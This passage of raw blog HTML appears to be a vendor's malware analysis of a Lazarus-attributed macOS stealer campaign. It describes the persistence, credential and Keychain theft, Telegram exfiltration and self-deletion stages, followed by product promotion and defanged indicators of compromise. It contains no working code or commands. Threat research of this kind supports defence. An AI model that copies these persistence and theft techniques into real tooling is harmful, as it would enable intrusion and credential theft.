https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-2048x1305.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-370x236.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-270x172.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-740x472.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Repeated curl commands posting the same file<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Next, a new binary called minst2.bin is retrieved from the \/payload C2 endpoint, marking the beginning of the persistence stage.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The Persistence Mechanism&nbsp;<\/h2>\n\n\n\n<p>minst2.bin was slightly trickier to debug, as it does not come bundled with a usage helper, so I had to manually fine-tune both the number and type of arguments&nbsp;required. After reverse engineering how the previous stage invokes it, I found that it takes the machine UUID, a payload URL, and a filename as arguments, and proceeds to download a remote file named&nbsp;localencode, saving it locally as OneDrive and setting it up to run at as a startup item.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"604\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-1024x604.png\" alt=\"\" class=\"wp-image-20219\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-1024x604.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-300x177.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-768x453.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-1536x906.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-2048x1207.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-370x218.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-270x159.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-740x436.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>A Bash service is created for persistence<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>To achieve this, it creates a folder called \u201cAntivirus Service\u201d,&nbsp;where it stores this binary, and sets up a&nbsp;LaunchAgent, the macOS equivalent of a Windows Service, to execute it at startup. From that point on, it re-invokes the malware kit at every login.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"650\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-1024x650.png\" alt=\"\" class=\"wp-image-20222\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-1024x650.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-300x191.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-768x488.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-1536x975.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-2048x1301.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-370x235.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-270x171.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/K-1-740x470.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>The&nbsp;LaunchAgent<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Moving on to the final stage, this script cleans up by&nbsp;deleting&nbsp;all ZIP files and downloaded fake applications (*.app) from the temporary directory. The parent process then&nbsp;proceeds&nbsp;to download the final binary in the kit: macrasv2.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The Stealer&nbsp;<\/h2>\n\n\n\n<p>Obtained from the same \/payload endpoint, macrasv2 is the final stealer and the main&nbsp;component&nbsp;of the chain.&nbsp;&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/94b9bc1f-86ff-4069-8222-1cb511d78ad9\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">See sandbox analysis of macrasv2<\/a>&nbsp;<\/p>\n\n\n\n<p>It stages all previously collected data, including, but not limited to, browser extension data, stored browser&nbsp;credentials&nbsp;and cookies (typically kept in SQLite databases), macOS Keychain entries, and other files of interest,&nbsp;consolidating&nbsp;them into a temporary directory. Since this is an empty laboratory, the number of staged files is&nbsp;relatively small.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"619\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-1024x619.png\" alt=\"\" class=\"wp-image-20224\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-1024x619.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-300x181.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-768x464.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-1536x929.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-2048x1238.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-370x224.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-270x163.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/L-1-740x447.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Final staging directory<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>From there, the data is archived into a file named user_ext.zip, preparing it for exfiltration.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"616\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-1024x616.png\" alt=\"\" class=\"wp-image-20226\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-1024x616.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-300x181.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-768x462.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-1536x924.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-2048x1232.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-370x223.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-270x162.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/M-1-740x445.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>ZIP file ready to be exfiltrated<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Exfiltration is carried out through a familiar channel, Telegram. In this case, however, the operators exposed their bot token, effectively allowing third parties to interact with the bot. This not only weakens their operational security but also simplifies reporting and potential takedown efforts.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"618\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-1024x618.png\" alt=\"\" class=\"wp-image-20228\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-1024x618.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-300x181.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-768x464.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-1536x928.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-2048x1237.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-370x223.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-270x163.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/N-1-740x447.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Telegram Bot\/API Key is leaked<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>This makes it trivial to both read the bot\u2019s messages, send messages on its behalf, and even&nbsp;identify&nbsp;its owner.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"805\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-1024x805.png\" alt=\"\" class=\"wp-image-20232\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-1024x805.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-300x236.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-768x604.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-1536x1207.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-2048x1610.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-370x291.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-270x212.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Z-1-740x582.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Operator&nbsp;identified&nbsp;via leaked Bot Key<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Finally, the malware invokes a self-deletion script named delete_self.sh, which simply removes itself and other components using the system\u2019s rm command.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"618\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-1024x618.png\" alt=\"\" class=\"wp-image-20234\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-1024x618.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-300x181.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-768x464.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-1536x928.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-2048x1237.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-370x223.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-270x163.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/O-1-740x447.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Self-deletion routine<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>With this, the full infection cycle is complete. Thanks to ANY.RUN\u2019s macOS analysis capabilities, we were able to fully reconstruct it in record time. It is worth noting that this is a novel (previously unseen) malware, which would typically require significantly more time to disassemble and analyze using traditional methods.&nbsp;<\/p>\n\n\n\n<p>Let\u2019s&nbsp;now move on to the ATT&amp;CK Matrix, followed by the IOCs and other interesting details.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Additional Observations&nbsp;<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The malware is badly written, with certain components entering infinite loops that may expose its presence due to system resource starvation.&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Operational security weaknesses were&nbsp;identified, such as exposed Telegram bot tokens and C2 endpoints with missing authentication.&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The use of ad-hoc code signing&nbsp;indicates&nbsp;an attempt to bypass macOS execution controls without valid developer credentials.&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Network traffic analysis shows that the malware primarily communicates over ports 8888 and 9999. Additionally, HTTP requests consistently use a User-Agent string associated with the Go programming language (e.g., Go-http-client), which aligns with other observed components of the toolset.&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The&nbsp;adversary\u2019s&nbsp;infrastructure exposed multiple services, including&nbsp;WinRM, Chrome Remote Desktop, Remote Desktop Protocol (RDP), and a replica of the C2 server running on port 110.&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Reverse engineering analysis&nbsp;indicates&nbsp;that multiple components of the malware are written in Go. This is supported by the presence of Go-specific strings and referenced artifacts within the binaries, including characteristic function naming conventions, runtime structures, and the use of the standard Go HTTP client in network communications.&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Defending Against Lazarus Attacks:&nbsp;How&nbsp;CISOs&nbsp;Can Minimize Risk&nbsp;<\/h2>\n\n\n\n<p>Trust-abuse phishing, exemplified by campaigns like&nbsp;<strong>Mach-O Man<\/strong>, exploits legitimate platforms to bypass conventional security measures. Attackers manipulate human psychology with urgent meeting requests or fake technical issues, tricking users into executing malicious commands or&nbsp;disclosing&nbsp;credentials.&nbsp;&nbsp;<\/p>\n\n\n\n<p>For SOC teams, the difficulty lies in detecting these attacks early, as they often slip past signature-based defenses by&nbsp;leveraging&nbsp;trusted services and user-driven actions.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Close Detection Gaps with&nbsp;Stronger&nbsp;Cross-Platform&nbsp;Triage&nbsp;<\/h3>\n\n\n\n<p>To combat these threats, SOCs must adopt&nbsp;<strong>interactive sandboxing<\/strong>&nbsp;as a cornerstone of their triage process. Unlike automated solutions,&nbsp;<a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>ANY.RUN<\/strong><\/a><strong>&nbsp;eliminates&nbsp;critical&nbsp;blind spots&nbsp;for security teams&nbsp;<\/strong>by enabling analysis of malicious files and URLs across&nbsp;<strong>Windows, macOS, Linux, and Android<\/strong>&nbsp;in a single interface.&nbsp;&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"643\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-1024x643.png\" alt=\"\" class=\"wp-image-20267\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-1024x643.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-300x188.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-768x482.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-1536x964.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-370x232.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-270x170.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2-740x465.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-3-2.png 1943w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN\u2019s sandbox delivers fast verdicts on malicious files and URLs<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Instead of juggling separate solutions for each OS, SOC teams gain a&nbsp;<strong>unified sandbox environment<\/strong>&nbsp;where they can manually simulate user interactions, uncover hidden attack stages, and capture behavioral IOCs,&nbsp;such as unusual&nbsp;sysctl&nbsp;queries in macOS or Mach-O binary execution.&nbsp;&nbsp;<\/p>\n\n\n\n<p>For business processes, this means&nbsp;<strong>streamlined triage,&nbsp;<\/strong>reducing analysis&nbsp;time&nbsp;and&nbsp;<a href=\"https:\/\/any.run\/integrations\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktointegrations\" target=\"_blank\" rel=\"noreferrer noopener\">integrating seamlessly<\/a>&nbsp;with SIEM\/SOAR for automated threat&nbsp;investigations.&nbsp;&nbsp;<\/p>\n\n\n\n<p>ANY.RUN delivers&nbsp;<strong>full attack context<\/strong>&nbsp;(process chains, network connections, system changes), which&nbsp;is especially critical for companies with&nbsp;<strong>hybrid infrastructures<\/strong>&nbsp;(corporate Windows, macOS for developers\/designers, Linux servers, and employee Android devices), where traditional sandboxes cover only part of the risk.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\n<span class=\"highlight\">Reduce MTTR by 21 minutes in your SOC. <\/span><br>Upgrade Tier 1 productivity with ANY.RUN.&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=lazarus-apt-macos-campaign&#038;utm_term=210426&#038;utm_content=linktosandboxlanding#contact-sales\" rel=\"noopener\" target=\"_blank\">\nContact us\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>When integrated into your SOC workflows, ANY.RUN\u2019s Sandbox delivers measurable impact, enabling security teams to:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Identify&nbsp;Credential Exposure Earlier:<\/strong>&nbsp;Detect threats in under 60 seconds and reduce breach probability before escalation begins&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Reduce MTTR:<\/strong>&nbsp;Achieve up to 21 minutes faster response time and 50% quicker IOC extraction&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Detect More Relevant Threats:<\/strong>&nbsp;Identify&nbsp;up to 58% more threats with real-time, sandbox-verified intelligence&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Minimize High-Severity Incidents:<\/strong>&nbsp;Earlier detection lowers escalation rates and limits impact on business operations&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Improve SOC Efficiency Without Hiring:<\/strong>&nbsp;Increase team performance up to 3x and reduce Tier 1 workload by 20%&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>&nbsp;<br>For businesses, this means&nbsp;<strong>fewer breaches, lower&nbsp;financial impact&nbsp;per incident, and more predictable security outcomes<\/strong>. Organizations gain control over both&nbsp;risk&nbsp;exposure and operational costs, rather than reacting after damage occurs.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">About ANY.RUN&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a>&nbsp;helps&nbsp;over 15,000&nbsp;organizations&nbsp;and 600,000 security professionals&nbsp;identify&nbsp;and understand threats before they turn into incidents.&nbsp;<\/p>\n\n\n\n<p>The solutions combine&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">interactive sandbox<\/a>&nbsp;analysis and real-time&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktolookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">threat intelligence<\/a>&nbsp;into a single workflow, allowing SOC teams to analyze files and URLs,&nbsp;observe&nbsp;full attack behavior, and make faster, more&nbsp;accurate&nbsp;decisions. Instead of relying on delayed indicators or assumptions, analysts see what the threat&nbsp;actually does&nbsp;and what risk it creates for the business.&nbsp;<\/p>\n\n\n\n<p>By strengthening monitoring, triage, and response, ANY.RUN enables organizations to detect more threats earlier, reduce response time, and limit the impact of credential theft, data exposure, and account compromise.&nbsp;<\/p>\n\n\n\n<p>The result is a more predictable and efficient SOC, where decisions are made faster, incidents are&nbsp;contained&nbsp;earlier, and business risk is reduced.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">IOCs and TTPs&nbsp;<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Network IOCs&nbsp;<\/h3>\n\n\n\n<p><strong>IP Addresses<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>172[.]86[.]113[.]102&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>144[.]172[.]114[.]220&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Domains<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>update-teams[.]live&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>livemicrosft[.]com&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>URLs<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>h[tt]p:\/\/172[.]86[.]113[.]102\/Onedrive&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>h[tt]ps:\/\/update-teams[.]live\/teams&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>h[tt]p:\/\/172[.]86[.]113[.]102\/localencode&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>livemicrosft[.]com\/meet\/89035563931?p=9jXK14VFM8fObdKxfkake8tD7rPhzs.1&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">File-based IOCs&nbsp;<\/h3>\n\n\n\n<p><strong>File Names<\/strong>&nbsp;<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-grid wp-container-core-group-is-layout-1 wp-block-group-is-layout-grid\">\n<ul class=\"wp-block-list\">\n<li>localencode&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>OneDrive&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>teamsSDK.bin&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>D1YrHRTg.bin&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>D1yCPUyk.bin&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>minst2.bin&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>macrasv2&nbsp;&nbsp;<\/li>\n<\/ul>\n<\/div><\/div>\n\n\n\n<p><strong>File Paths<\/strong>&nbsp;<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-grid wp-container-core-group-is-layout-2 wp-block-group-is-layout-grid\">\n<ul class=\"wp-block-list\">\n<li>\/Users\/$USER\/.local\/bin\/OneDrive&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>~\/Library\/.initialized&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>~\/Library\/LaunchAgents\/com.onedrive.launcher.plist&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>~\/Library\/LaunchAgents\/com.onedrive.launcher.tmp&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>$TMPDIR\/OneDrive&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>$TMPDIR\/geniex_client_sleep_state&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>bin.config&nbsp;&nbsp;<\/li>\n<\/ul>\n<\/div><\/div>\n\n\n\n<p><strong>File Hashes (SHA256)<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>eb3eae776d175f7fb2fb9986c89154102ba8eabfde10a155af4dfb18f28be1b5 (com.onedrive.launcher.plist)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>eb3eae776d175f7fb2fb9986c89154102ba8eabfde10a155af4dfb18f28be1b5 (com.onedrive.launcher.tmp)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90 (D1yCPUyk.bin)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90 (D1YrHRTg.bin)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614 (localencode&nbsp;\/ OneDrive)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>85bed283ba95d40d99e79437e6a3161336c94ec0acbc0cd38599d0fc9b2e393c (macrasv2)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>cc31b3dc8aeed0af9dd24b7e739f183527d55d5b5ecd3d93ba45dd4aaa8ba260 (MauroDPRKSamples.zip)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>4b08a9e221a20b8024cf778d113732b3e12d363250231e78bae13b1f1dc1495b (minst2.bin)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>89616a503ffee8fc70f13c82c4a5e4fa4efafa61410971f4327ed38328af2938 (SystemApp.zip)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul 